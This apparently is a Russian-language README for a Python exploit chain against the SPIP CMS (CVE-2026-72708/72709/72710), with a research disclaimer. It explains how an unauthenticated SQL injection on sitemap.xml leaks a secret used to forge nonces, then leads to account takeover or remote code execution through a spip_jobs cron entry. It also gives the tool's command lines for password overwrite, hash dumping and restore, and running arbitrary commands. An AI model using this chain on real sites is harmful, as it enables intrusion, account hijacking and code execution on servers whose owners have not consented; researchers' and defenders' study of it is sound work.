
Цепочка эксплойтов на Python для CVE SPIP 2026-72708/72709/72710, объединяющая неаутентифицированную SQL-инъекцию с захватом учётной записи и удалённым выполнением кода.
Эксплойт для CVE-2026-72708, CVE-2026-72709 и CVE-2026-72710, обнаруженных Franck Chevalier (Wayko)
Полный технический разбор читайте в статье в блоге Lexfo.
Этот репозиторий предоставлен исключительно в целях исследований и защитной безопасности. Автор не несёт ответственности за неправомерное использование этой информации.
Точка входа — SQL-инъекция на публичной странице sitemap.xml, позволяющая утечь alea_ephemere.
С этим секретом можно подделывать валидные nonce для анонимных действий.
Отсюда два действия ведут к RCE:
action=editer_auteur — захват учётной записи, затем RCE из приватной области.action=editer_objet — mass assignment для записи строки в очередь spip_jobs, затем её выполнение через action=cron.python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"
Перед перезаписью --ato выгружает login цели и текущий хеш pass
(через SQLi), чтобы вы могли вернуть их обратно с помощью --restore-hash:
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"
Файл будет записан в IMG/casse-spip_<token>.html.